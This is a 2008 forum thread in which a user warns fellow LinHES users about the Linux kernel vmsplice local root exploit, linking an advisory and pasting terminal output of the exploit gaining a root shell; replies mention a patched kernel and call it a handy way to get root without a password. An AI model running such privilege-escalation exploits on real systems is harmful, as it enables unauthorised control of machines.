Currently a handy way to get root without a password
| LinHES Forums http://forum.linhes.org/ |
|
| Root exploit in linux kernel http://forum.linhes.org/viewtopic.php?f=5&t=17887 |
Page 1 of 1 |
| Author: | techman83 [ Tue Feb 12, 2008 8:07 pm ] |
| Post subject: | Root exploit in linux kernel |
For most this shouldn't be a drama, but please if you have external SSH available, make sure your passwords are secure. As for the moment any account will allow root access to our boxen with this exploit. http://www.securityfocus.com/bid/27704/info I can confirm it works leon@mythbox:~$ ./Exploit1 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7da7000 .. 0xb7dd9000 [+] root root@mythbox:~# whoami root Fixed in later kernels. |
|
| Author: | Human [ Thu Feb 14, 2008 11:03 pm ] |
| Post subject: | |
Good find! The next release will have 2.6.22 or later, which should have the patch. |
|
| Author: | techman83 [ Thu Feb 14, 2008 11:11 pm ] |
| Post subject: | |
Currently a handy way to get root without a password
|
|
| Page 1 of 1 | All times are UTC - 6 hours |
| Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |
|